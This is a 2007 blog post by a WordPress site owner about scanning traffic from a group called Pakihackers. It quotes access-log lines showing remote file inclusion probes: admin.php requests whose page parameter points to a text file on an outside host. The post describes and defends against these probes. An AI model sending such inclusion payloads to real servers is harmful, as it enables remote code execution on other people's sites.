What, oh What are the Pakihackers up to?

The Pakihackers started showing up in various hitlogs reciently.

Hitlog evidence

Hitlog story regarding the Pakihackers Corp. is this:

 220.232.130.49 - - [14/Aug/2007:12:00:08 -0400] “GET /2007/07/23/4/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1″ 404 8269 “-” “libwww-perl/5.808″
220.232.130.49 - - [14/Aug/2007:12:00:10 -0400] “GET /admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1″ 404 22871 “-” “libwww-perl/5.808″
220.232.130.49 - - [14/Aug/2007:12:00:12 -0400] “GET /2007/07/23/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1″ 404 8206 “-” “libwww-perl/5.808″

Bad for your server

Everything indicates that Pakihackers are very bad for you and your server(s).

130.232.220.in-addr.arpa. 10800 IN      SOA     ns1.pacific.net.hk. postmaster.pacific.net.hk

It really did not make me shocked to learn that Pakihackers are .hk based. It does look like they are doing automatic checks for some kind of WP/WPMU exploit of somekind.

Pakihackers scanning is not dangerous if you are using recient versions of WPMU (v.1.2.3 / v1.2.4). But it’s kind of annoying, because they keep on hammering these lame requires all day long. Perhaps pakihackers are bad for you if you’re using some ancient WP version, who knows.

Explore posts in the same categories: Computer technology, Internet, WordPress

This entry was posted on Tuesday, August 14th, 2007 at 12:10 pm and is filed under Computer technology, Internet, WordPress. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.